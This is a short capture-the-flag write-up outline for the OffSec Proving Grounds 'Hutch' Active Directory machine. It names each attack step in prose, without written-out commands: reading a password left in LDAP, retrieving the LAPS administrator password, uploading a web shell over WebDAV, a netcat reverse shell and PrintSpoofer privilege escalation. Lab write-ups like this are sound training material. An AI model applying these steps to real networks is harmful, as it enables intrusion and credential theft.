Hutch Proving Grounds Write-Up
SUMMARY
This write-up covers the Hutch machine from Offsec’s Proving Grounds, an Active Directory environment where unauthenticated access to LDAP provided the initial foothold.
Running ldapsearch without credentials exposed a password stored in a user attribute. Cross-referencing the data revealed the password belonged to fmcsorley. After validating the credentials with netexec, BloodHound was used to analyze domain privileges and identified that fmcsorley held the ReadLAPSPassword privilege. A second ldapsearch query targeting the ms-Mcs-AdmPwd attribute returned the Administrator password in cleartext, completing the machine.
An alternative path was also explored: fmcsorley’s credentials allowed connecting to an IIS WebDAV service via cadaver. Since the PUT method was enabled, a cmd.aspx web shell was uploaded and used to execute commands. nc.exe was then transferred to the machine, a reverse shell was established, and the SeImpersonatePrivilege found on the compromised user was abused via PrintSpoofer64.exe to escalate to Administrator.
PATH TO FOLLOW
Primary Path:
- Reconnaissance & Unauthenticated LDAP Enumeration
- Cleartext Credential Discovery in User Attribute
- BloodHound Analysis & ReadLAPSPassword Identification
- LAPS Password Retrieval via
ldapsearch - Administrator Access
Alternative Path:
- WebDAV Discovery &
cadaverAuthentication - ASPX Web Shell Upload via HTTP PUT
- Reverse Shell via
nc.exe - Abusing SeImpersonatePrivilege with PrintSpoofer
- Shell as Administrator
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.